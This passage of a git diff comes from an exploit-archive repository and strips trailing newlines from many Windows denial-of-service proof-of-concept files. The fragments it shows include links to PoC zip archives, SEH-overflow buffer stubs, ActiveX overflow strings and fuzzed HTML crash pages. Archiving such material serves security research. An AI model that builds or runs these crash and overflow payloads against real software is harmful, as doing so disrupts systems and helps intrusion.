+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39509.zip \ No newline at end of file diff --git a/platforms/windows/dos/39512.txt b/platforms/windows/dos/39512.txt index 2f89e2470..7f0c1cf1b 100755 --- a/platforms/windows/dos/39512.txt +++ b/platforms/windows/dos/39512.txt @@ -12,4 +12,4 @@ Multiple Access violations POC: https://www.dropbox.com/s/rtakkmw9ru55lbn/CALENDARLib.zip?dl=0 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39512.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39512.zip \ No newline at end of file diff --git a/platforms/windows/dos/39516.py b/platforms/windows/dos/39516.py index 5073ed77e..60cdcef4b 100755 --- a/platforms/windows/dos/39516.py +++ b/platforms/windows/dos/39516.py @@ -49,4 +49,4 @@ try: s.close() print "[*] Done." except: - print "[-] Error connecting" + print "[-] Error connecting" \ No newline at end of file diff --git a/platforms/windows/dos/39517.py b/platforms/windows/dos/39517.py index a9509b52f..ca64f22d3 100755 --- a/platforms/windows/dos/39517.py +++ b/platforms/windows/dos/39517.py @@ -52,4 +52,4 @@ try: print "[*] Done." except: - print "[-] Error connecting" + print "[-] Error connecting" \ No newline at end of file diff --git a/platforms/windows/dos/39518.txt b/platforms/windows/dos/39518.txt index 8591c010b..feacf641b 100755 --- a/platforms/windows/dos/39518.txt +++ b/platforms/windows/dos/39518.txt @@ -12,4 +12,4 @@ Negative height and width values cause a program crash (memory corruption) and S Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39518.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39518.zip \ No newline at end of file diff --git a/platforms/windows/dos/39530.txt b/platforms/windows/dos/39530.txt index 697ced0c8..82fa68a42 100755 --- a/platforms/windows/dos/39530.txt +++ b/platforms/windows/dos/39530.txt @@ -121,5 +121,4 @@ This looks like broken authenticode parsing to me. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39530.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39530.zip \ No newline at end of file diff --git a/platforms/windows/dos/39546.txt b/platforms/windows/dos/39546.txt index 40f948f53..1805c477b 100755 --- a/platforms/windows/dos/39546.txt +++ b/platforms/windows/dos/39546.txt @@ -68,4 +68,4 @@ by pointing to an uninitialized space of memory.An attacker can leverage this vu http://protekresearchlab.com/exploits/COSIG-2016-13.pdf https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39546.zip -############################################################################### +############################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/39560.txt b/platforms/windows/dos/39560.txt index 4c84f2e2d..cf56b75d1 100755 --- a/platforms/windows/dos/39560.txt +++ b/platforms/windows/dos/39560.txt @@ -74,5 +74,4 @@ Attached is an archive with the proof-of-concept mutated OTF file, together with Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39560.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39560.zip \ No newline at end of file diff --git a/platforms/windows/dos/39561.txt b/platforms/windows/dos/39561.txt index 1d60858c9..97aed4dfe 100755 --- a/platforms/windows/dos/39561.txt +++ b/platforms/windows/dos/39561.txt @@ -61,5 +61,4 @@ Attached is an archive with the proof-of-concept mutated OTF file, together with Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39561.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39561.zip \ No newline at end of file diff --git a/platforms/windows/dos/39565.txt b/platforms/windows/dos/39565.txt index 4f1125a6b..fb12d01e9 100755 --- a/platforms/windows/dos/39565.txt +++ b/platforms/windows/dos/39565.txt @@ -87,4 +87,4 @@ src = String(900, "A") + "BB" + "CC" + String(105, "D") + String(100, "EE") unpack = "exploit.zip" anida.UnpackFile src, unpack </script> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/39600.txt b/platforms/windows/dos/39600.txt index 9190db069..7d26068e0 100755 --- a/platforms/windows/dos/39600.txt +++ b/platforms/windows/dos/39600.txt @@ -56,5 +56,4 @@ Without page heap, you should get heap corruption, probably writing to 0x4141414 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39600.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39600.zip \ No newline at end of file diff --git a/platforms/windows/dos/39601.txt b/platforms/windows/dos/39601.txt index f256c4ce8..4e86728a1 100755 --- a/platforms/windows/dos/39601.txt +++ b/platforms/windows/dos/39601.txt @@ -12,5 +12,4 @@ The attached testcase will attempt to free() an invalid pointer to demonstrate t Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39601.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39601.zip \ No newline at end of file diff --git a/platforms/windows/dos/39602.txt b/platforms/windows/dos/39602.txt index 2bf8a03c1..87406dc1e 100755 --- a/platforms/windows/dos/39602.txt +++ b/platforms/windows/dos/39602.txt @@ -37,5 +37,4 @@ This is trying to initialize the probabilities array, but overflowing the heap b Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39602.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39602.zip \ No newline at end of file diff --git a/platforms/windows/dos/39603.txt b/platforms/windows/dos/39603.txt index 366d261c5..5daee50eb 100755 --- a/platforms/windows/dos/39603.txt +++ b/platforms/windows/dos/39603.txt @@ -35,5 +35,4 @@ script!CreateInstance+0x178ac: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39603.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39603.zip \ No newline at end of file diff --git a/platforms/windows/dos/39605.txt b/platforms/windows/dos/39605.txt index bd1cdff1e..e903903a7 100755 --- a/platforms/windows/dos/39605.txt +++ b/platforms/windows/dos/39605.txt @@ -74,5 +74,4 @@ I think the same bug exists in rtcSpaceBstr, rtcSpaceVar, rtcUpperCaseBstr, rtcU Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39605.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39605.zip \ No newline at end of file diff --git a/platforms/windows/dos/39606.txt b/platforms/windows/dos/39606.txt index 28592f8cb..d72515ea8 100755 --- a/platforms/windows/dos/39606.txt +++ b/platforms/windows/dos/39606.txt @@ -47,5 +47,4 @@ Please note that many of the CAV modules used by Comodo do not use dynamic base, Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39606.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39606.zip \ No newline at end of file diff --git a/platforms/windows/dos/39608.txt b/platforms/windows/dos/39608.txt index 5fa1648fe..e374dd684 100755 --- a/platforms/windows/dos/39608.txt +++ b/platforms/windows/dos/39608.txt @@ -4,4 +4,4 @@ The attached fuzz case causes a crash in shape rendering. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39608.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39608.zip \ No newline at end of file diff --git a/platforms/windows/dos/39609.txt b/platforms/windows/dos/39609.txt index 12c425817..4133fd04e 100755 --- a/platforms/windows/dos/39609.txt +++ b/platforms/windows/dos/39609.txt @@ -4,5 +4,4 @@ There is a heap overflow in the Zlib codecs used when playing flv files in flash Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39609.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39609.zip \ No newline at end of file diff --git a/platforms/windows/dos/39610.txt b/platforms/windows/dos/39610.txt index 133ab7590..662958709 100755 --- a/platforms/windows/dos/39610.txt +++ b/platforms/windows/dos/39610.txt @@ -6,5 +6,4 @@ A sample swf is attached. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39610.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39610.zip \ No newline at end of file diff --git a/platforms/windows/dos/39611.txt b/platforms/windows/dos/39611.txt index 9cdbc9d36..7274db342 100755 --- a/platforms/windows/dos/39611.txt +++ b/platforms/windows/dos/39611.txt @@ -14,5 +14,4 @@ A PoC is attached, it is a bit finicky but crashes in the most recent Chrome Fla Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39611.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39611.zip \ No newline at end of file diff --git a/platforms/windows/dos/39612.txt b/platforms/windows/dos/39612.txt index f51bb69e4..d65865c70 100755 --- a/platforms/windows/dos/39612.txt +++ b/platforms/windows/dos/39612.txt @@ -13,5 +13,4 @@ A PoC is attached, it is a bit finicky but crashes in the most recent Chrome Fla Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39612.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39612.zip \ No newline at end of file diff --git a/platforms/windows/dos/39613.txt b/platforms/windows/dos/39613.txt index f5a67d224..523486dd6 100755 --- a/platforms/windows/dos/39613.txt +++ b/platforms/windows/dos/39613.txt @@ -12,5 +12,4 @@ A PoC is attached, it is a bit finicky and depends a lot on the specific Flash v Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39613.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39613.zip \ No newline at end of file diff --git a/platforms/windows/dos/39647.txt b/platforms/windows/dos/39647.txt index b5157f7dc..a8685bbe9 100755 --- a/platforms/windows/dos/39647.txt +++ b/platforms/windows/dos/39647.txt @@ -4,5 +4,4 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=686 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39647.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39647.zip \ No newline at end of file diff --git a/platforms/windows/dos/39648.txt b/platforms/windows/dos/39648.txt index 421d9f1f3..702bdeaf8 100755 --- a/platforms/windows/dos/39648.txt +++ b/platforms/windows/dos/39648.txt @@ -4,5 +4,4 @@ The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39648.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39648.zip \ No newline at end of file diff --git a/platforms/windows/dos/3965.pl b/platforms/windows/dos/3965.pl index 8d908dc3a..a19b205e1 100755 --- a/platforms/windows/dos/3965.pl +++ b/platforms/windows/dos/3965.pl @@ -65,4 +65,4 @@ foreach $thr (threads->list) { } } -# milw0rm.com [2007-05-21] +# milw0rm.com [2007-05-21] \ No newline at end of file diff --git a/platforms/windows/dos/39663.html b/platforms/windows/dos/39663.html index 0ce7ec65b..4fb928c35 100755 --- a/platforms/windows/dos/39663.html +++ b/platforms/windows/dos/39663.html @@ -39,4 +39,4 @@ ct>+0xb6 0bb14e14 607e30e6 MSHTML!PROPERTYDESC::CallHandler+0x855996 0bb14e54 60b83323 MSHTML!CElement::SetAttributeFromPropDesc+0xbe 0bb14ee4 607e2f44 MSHTML!CElement::ie9_setAttributeNSInternal+0x2ee ---> +--> \ No newline at end of file diff --git a/platforms/windows/dos/3969.html b/platforms/windows/dos/3969.html index d34d670d5..ff6ae08bb 100755 --- a/platforms/windows/dos/3969.html +++ b/platforms/windows/dos/3969.html @@ -35,4 +35,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-22] +# milw0rm.com [2007-05-22] \ No newline at end of file diff --git a/platforms/windows/dos/39699.html b/platforms/windows/dos/39699.html index e57ce62e5..b6ebea963 100755 --- a/platforms/windows/dos/39699.html +++ b/platforms/windows/dos/39699.html @@ -111,4 +111,4 @@ <iframe id='t1'></iframe><iframe id='e1'></iframe> <div id='oneUnArg'>||||</div> </body> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/3973.html b/platforms/windows/dos/3973.html index 96c031a03..4fdf74c2e 100755 --- a/platforms/windows/dos/3973.html +++ b/platforms/windows/dos/3973.html @@ -41,4 +41,4 @@ EIP 00610061 </code></pre> -# milw0rm.com [2007-05-23] +# milw0rm.com [2007-05-23] \ No newline at end of file diff --git a/platforms/windows/dos/39740.cpp b/platforms/windows/dos/39740.cpp index e09b9670e..37a72ea6a 100755 --- a/platforms/windows/dos/39740.cpp +++ b/platforms/windows/dos/39740.cpp @@ -349,6 +349,4 @@ int main(int argc, char** argv) CreateProcess(nullptr, cmdline, nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo); return 0; -} - - +} \ No newline at end of file diff --git a/platforms/windows/dos/39743.txt b/platforms/windows/dos/39743.txt index 8f4e415d1..376e74983 100755 --- a/platforms/windows/dos/39743.txt +++ b/platforms/windows/dos/39743.txt @@ -79,5 +79,4 @@ When the "Smooth edges of screen fonts" option is disabled, the bugcheck also oc Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39743.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39743.zip \ No newline at end of file diff --git a/platforms/windows/dos/3976.pl b/platforms/windows/dos/3976.pl index 715fd7888..6230e9748 100755 --- a/platforms/windows/dos/3976.pl +++ b/platforms/windows/dos/3976.pl @@ -169,4 +169,4 @@ close (MYFILE); print("\n\nCrafted Project has been generated!!!\n\n"); -# milw0rm.com [2007-05-23] +# milw0rm.com [2007-05-23] \ No newline at end of file diff --git a/platforms/windows/dos/3977.pl b/platforms/windows/dos/3977.pl index b6ec09fdd..e9bcb5737 100755 --- a/platforms/windows/dos/3977.pl +++ b/platforms/windows/dos/3977.pl @@ -138,4 +138,4 @@ close (MYFILE); print("\n\nCrafted Project has been generated!!!\n\n"); -# milw0rm.com [2007-05-23] +# milw0rm.com [2007-05-23] \ No newline at end of file diff --git a/platforms/windows/dos/39770.txt b/platforms/windows/dos/39770.txt index fa979d039..501eba4e5 100755 --- a/platforms/windows/dos/39770.txt +++ b/platforms/windows/dos/39770.txt @@ -40,5 +40,4 @@ So it looks like that calculation is used as an index into @rsi, which is obviou Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39770.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39770.zip \ No newline at end of file diff --git a/platforms/windows/dos/39774.html b/platforms/windows/dos/39774.html index 3033faae4..f468ef353 100755 --- a/platforms/windows/dos/39774.html +++ b/platforms/windows/dos/39774.html @@ -33,5 +33,4 @@ The vulnerability can be used to Phishing attack, Because the URL can be the sam Contact: liuzhu09@huawei.com ---> - +--> \ No newline at end of file diff --git a/platforms/windows/dos/39778.txt b/platforms/windows/dos/39778.txt index a34a52ae6..2ca1d47ec 100755 --- a/platforms/windows/dos/39778.txt +++ b/platforms/windows/dos/39778.txt @@ -4,5 +4,4 @@ There is a use-after-free that appears to be related to rendering the display ba Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39778.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39778.zip \ No newline at end of file diff --git a/platforms/windows/dos/39779.txt b/platforms/windows/dos/39779.txt index bdabbc3cf..f56658559 100755 --- a/platforms/windows/dos/39779.txt +++ b/platforms/windows/dos/39779.txt @@ -4,5 +4,4 @@ There is a use-after-free in MovieClip.duplicateMovieClip.If an action associate Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39779.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39779.zip \ No newline at end of file diff --git a/platforms/windows/dos/3978.pl b/platforms/windows/dos/3978.pl index 87841398b..1b5db1650 100755 --- a/platforms/windows/dos/3978.pl +++ b/platforms/windows/dos/3978.pl @@ -99,4 +99,4 @@ print "Please note you will have to have both 1.cue and 1.bin in the same dir\n" print "To be able to reproduce the bug open the 1.cue file with ultra~iso\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; -# milw0rm.com [2007-05-24] +# milw0rm.com [2007-05-24] \ No newline at end of file diff --git a/platforms/windows/dos/39789.py b/platforms/windows/dos/39789.py index e8cbd1f62..d4e9ac404 100755 --- a/platforms/windows/dos/39789.py +++ b/platforms/windows/dos/39789.py @@ -26,5 +26,4 @@ nseh = "B"*4 seh = "C" *4 f = open("evil.txt", "wb") f.write(buffer+nseh+seh) -f.close() - +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/3979.html b/platforms/windows/dos/3979.html index 3d26f70bc..214d61fd9 100755 --- a/platforms/windows/dos/3979.html +++ b/platforms/windows/dos/3979.html @@ -33,4 +33,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-24] +# milw0rm.com [2007-05-24] \ No newline at end of file diff --git a/platforms/windows/dos/39795.pl b/platforms/windows/dos/39795.pl index d03b3fd12..eeabbd81f 100755 --- a/platforms/windows/dos/39795.pl +++ b/platforms/windows/dos/39795.pl @@ -25,4 +25,4 @@ $mp3 = MP3::Tag->new('1.mp3'); $mp3->title_set('A' x 500000); $mp3->artist_set('A' x 500000); $mp3->update_tags(); -$mp3->close(); +$mp3->close(); \ No newline at end of file diff --git a/platforms/windows/dos/39802.py b/platforms/windows/dos/39802.py index 645caf877..bf4607d68 100755 --- a/platforms/windows/dos/39802.py +++ b/platforms/windows/dos/39802.py @@ -25,5 +25,4 @@ nseh = "B"*4 seh = "C" *4 f = open("evil.txt", "wb") f.write(buffer+nseh+seh) -f.close() - +f.close() \ No newline at end of file diff --git a/platforms/windows/dos/39819.txt b/platforms/windows/dos/39819.txt index 8ab8a10f7..da19a3968 100755 --- a/platforms/windows/dos/39819.txt +++ b/platforms/windows/dos/39819.txt @@ -225,4 +225,4 @@ OGL!GdipGetImageThumbnail+0x1118e: 44175083 ff7104 push dword ptr [ecx+4] ds:0023:00000004=???????? ---------------------------------------------------------------------- -By: HauntIT Blog @ 2016 +By: HauntIT Blog @ 2016 \ No newline at end of file diff --git a/platforms/windows/dos/39832.txt b/platforms/windows/dos/39832.txt index 0c9e5d508..b5b0cce60 100755 --- a/platforms/windows/dos/39832.txt +++ b/platforms/windows/dos/39832.txt @@ -114,5 +114,4 @@ Another note is that the gdi32.dll SETICMPROFILEA and SETICMPROFILEW record hand Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39832.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39832.zip \ No newline at end of file diff --git a/platforms/windows/dos/39833.txt b/platforms/windows/dos/39833.txt index 72b5e4d91..3032699db 100755 --- a/platforms/windows/dos/39833.txt +++ b/platforms/windows/dos/39833.txt @@ -122,5 +122,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39833.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39833.zip \ No newline at end of file diff --git a/platforms/windows/dos/39846.txt b/platforms/windows/dos/39846.txt index 9d75943c8..38167a9c3 100755 --- a/platforms/windows/dos/39846.txt +++ b/platforms/windows/dos/39846.txt @@ -328,4 +328,4 @@ argCount = 1 arg1=String(1044, "A") target.MenuItemCaptionValueY = arg1 </script> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/39857.txt b/platforms/windows/dos/39857.txt index 2a6fb461c..d377611ec 100755 --- a/platforms/windows/dos/39857.txt +++ b/platforms/windows/dos/39857.txt @@ -413,5 +413,4 @@ kernel32!GetProfileStringW+0x12cc1: 10. Host (FTP Client): ---------------------- -For the RUMBA FTP Client PoC, copy ~300 bytes array and paste it in the Host field when creating a new session. - +For the RUMBA FTP Client PoC, copy ~300 bytes array and paste it in the Host field when creating a new session. \ No newline at end of file diff --git a/platforms/windows/dos/3986.html b/platforms/windows/dos/3986.html index 084f2e035..d0a6ce880 100755 --- a/platforms/windows/dos/3986.html +++ b/platforms/windows/dos/3986.html @@ -31,4 +31,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-25] +# milw0rm.com [2007-05-25] \ No newline at end of file diff --git a/platforms/windows/dos/39915.c b/platforms/windows/dos/39915.c index abfc4dc58..dfab8631e 100755 --- a/platforms/windows/dos/39915.c +++ b/platforms/windows/dos/39915.c @@ -188,4 +188,4 @@ int main(int argc, char ** argv) getchar(); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/39959.txt b/platforms/windows/dos/39959.txt index 48212f31f..406a35bea 100755 --- a/platforms/windows/dos/39959.txt +++ b/platforms/windows/dos/39959.txt @@ -4,5 +4,4 @@ The attached PoC triggers a blue screen on Windows 7 with special pool enabled o Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39959.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39959.zip \ No newline at end of file diff --git a/platforms/windows/dos/39960.txt b/platforms/windows/dos/39960.txt index 3b032b206..e270d18fd 100755 --- a/platforms/windows/dos/39960.txt +++ b/platforms/windows/dos/39960.txt @@ -4,5 +4,4 @@ The attached PoC crashes 32-bit Windows 7 with special pool enabled on win32k.sy Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39960.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39960.zip \ No newline at end of file diff --git a/platforms/windows/dos/39966.txt b/platforms/windows/dos/39966.txt index 5091517d5..78977a88a 100755 --- a/platforms/windows/dos/39966.txt +++ b/platforms/windows/dos/39966.txt @@ -45,4 +45,4 @@ Feeding this command overwrites EBP with 0x00410041 and EIP with 0x00420042 https://sourceforge.net/projects/blat/ -https://groups.yahoo.com/neo/groups/blat/conversations/messages/13759 +https://groups.yahoo.com/neo/groups/blat/conversations/messages/13759 \ No newline at end of file diff --git a/platforms/windows/dos/39990.txt b/platforms/windows/dos/39990.txt index 84f71f2b3..986ff57a6 100755 --- a/platforms/windows/dos/39990.txt +++ b/platforms/windows/dos/39990.txt @@ -52,5 +52,4 @@ In order to demonstrate that the bug is real and affects Internet Explorer (amon Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39990.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39990.zip \ No newline at end of file diff --git a/platforms/windows/dos/39991.txt b/platforms/windows/dos/39991.txt index 427fd81ac..f14650e30 100755 --- a/platforms/windows/dos/39991.txt +++ b/platforms/windows/dos/39991.txt @@ -149,5 +149,4 @@ References: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39991.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39991.zip \ No newline at end of file diff --git a/platforms/windows/dos/40074.txt b/platforms/windows/dos/40074.txt index 272bab0d7..d7d7683ae 100755 --- a/platforms/windows/dos/40074.txt +++ b/platforms/windows/dos/40074.txt @@ -227,4 +227,4 @@ for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. -HYP3RLINX +HYP3RLINX \ No newline at end of file diff --git a/platforms/windows/dos/4009.html b/platforms/windows/dos/4009.html index 471acef16..292c7fcdb 100755 --- a/platforms/windows/dos/4009.html +++ b/platforms/windows/dos/4009.html @@ -32,4 +32,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-30] +# milw0rm.com [2007-05-30] \ No newline at end of file diff --git a/platforms/windows/dos/4011.html b/platforms/windows/dos/4011.html index 173e3c019..ddabb938a 100755 --- a/platforms/windows/dos/4011.html +++ b/platforms/windows/dos/4011.html @@ -36,4 +36,4 @@ EIP 7C92142E ntdll.7C92142E </span></span> </code></pre> -# milw0rm.com [2007-05-30] +# milw0rm.com [2007-05-30] \ No newline at end of file diff --git a/platforms/windows/dos/4012.html b/platforms/windows/dos/4012.html index 809362902..ecb5302f4 100755 --- a/platforms/windows/dos/4012.html +++ b/platforms/windows/dos/4012.html @@ -27,4 +27,4 @@ </span></span> </code></pre> -# milw0rm.com [2007-05-30] +# milw0rm.com [2007-05-30] \ No newline at end of file diff --git a/platforms/windows/dos/4017.cpp b/platforms/windows/dos/4017.cpp index d316c68fe..b2f7653d0 100755 --- a/platforms/windows/dos/4017.cpp +++ b/platforms/windows/dos/4017.cpp @@ -96,4 +96,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2007-05-31] +// milw0rm.com [2007-05-31] \ No newline at end of file diff --git a/platforms/windows/dos/40192.py b/platforms/windows/dos/40192.py index 785ea5380..8bacd0cf9 100755 --- a/platforms/windows/dos/40192.py +++ b/platforms/windows/dos/40192.py @@ -23,4 +23,4 @@ file = open(file, 'w') file.write(buffer) file.close() -# +++++ +# +++++ \ No newline at end of file diff --git a/platforms/windows/dos/40208.py b/platforms/windows/dos/40208.py index 37a90ac96..c467707c7 100755 --- a/platforms/windows/dos/40208.py +++ b/platforms/windows/dos/40208.py @@ -51,4 +51,4 @@ try: print "[*] Done." except: - print "[-] Error connecting" + print "[-] Error connecting" \ No newline at end of file diff --git a/platforms/windows/dos/40253.html b/platforms/windows/dos/40253.html index 437a03116..315c3194c 100755 --- a/platforms/windows/dos/40253.html +++ b/platforms/windows/dos/40253.html @@ -18,4 +18,4 @@ function eventhandler5() { <applet onmouseout="eventhandler6()" truespeed="-1.86811e+009" spellcheck="A" frameborder="all" pluginurl="bottom" link="-32" part="file" ononline="eventhandler1()" onwebkittransitionend="eventhandler10()" onerror="eventhandler5()" char="void" direction="-1">iiThS9l_J8 </xmp> </select>A7 -<object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file"> +<object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file"> \ No newline at end of file diff --git a/platforms/windows/dos/40255.txt b/platforms/windows/dos/40255.txt index aca071032..0d815bc79 100755 --- a/platforms/windows/dos/40255.txt +++ b/platforms/windows/dos/40255.txt @@ -99,4 +99,4 @@ The above analysis was performed using the gdiplus.dll file found in C:\Windows\ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40255.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40255.zip \ No newline at end of file diff --git a/platforms/windows/dos/40256.txt b/platforms/windows/dos/40256.txt index d45e27b32..768ae7cd7 100755 --- a/platforms/windows/dos/40256.txt +++ b/platforms/windows/dos/40256.txt @@ -81,4 +81,4 @@ The above analysis was performed using the gdiplus.dll file found in C:\Windows\ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40256.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40256.zip \ No newline at end of file diff --git a/platforms/windows/dos/40257.txt b/platforms/windows/dos/40257.txt index d561dbd71..22f85b2bd 100755 --- a/platforms/windows/dos/40257.txt +++ b/platforms/windows/dos/40257.txt @@ -119,4 +119,4 @@ The above analysis was performed using the gdiplus.dll file found in C:\Windows\ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40257.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40257.zip \ No newline at end of file diff --git a/platforms/windows/dos/4033.rb b/platforms/windows/dos/4033.rb index 10a38fdf9..82609cb8b 100755 --- a/platforms/windows/dos/4033.rb +++ b/platforms/windows/dos/4033.rb @@ -56,4 +56,4 @@ class Auxiliary::Dos::Windows::Snmpc < Msf::Auxiliary end end -# milw0rm.com [2007-06-04] +# milw0rm.com [2007-06-04] \ No newline at end of file diff --git a/platforms/windows/dos/40374.html b/platforms/windows/dos/40374.html index 3623ae59b..263c6eaf6 100755 --- a/platforms/windows/dos/40374.html +++ b/platforms/windows/dos/40374.html @@ -104,4 +104,4 @@ <iframe></iframe><iframe src='about:blank' id='e1'></iframe> </body> </html> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/40398.txt b/platforms/windows/dos/40398.txt index c05f1c106..249fc99de 100755 --- a/platforms/windows/dos/40398.txt +++ b/platforms/windows/dos/40398.txt @@ -56,4 +56,4 @@ Attached is a Proof of Concept Python script, which connects to the COM1 serial Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40398.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40398.zip \ No newline at end of file diff --git a/platforms/windows/dos/40399.txt b/platforms/windows/dos/40399.txt index 2fb1784ea..38de879be 100755 --- a/platforms/windows/dos/40399.txt +++ b/platforms/windows/dos/40399.txt @@ -62,4 +62,4 @@ It was empirically confirmed that some of the heap corruptions can be leveraged Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40399.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40399.zip \ No newline at end of file diff --git a/platforms/windows/dos/40406.txt b/platforms/windows/dos/40406.txt index 9e5f57013..2f1684fc5 100755 --- a/platforms/windows/dos/40406.txt +++ b/platforms/windows/dos/40406.txt @@ -83,4 +83,4 @@ Given the different crashing contexts related to timing when breakpoints are set Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40406.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40406.zip \ No newline at end of file diff --git a/platforms/windows/dos/40439.py 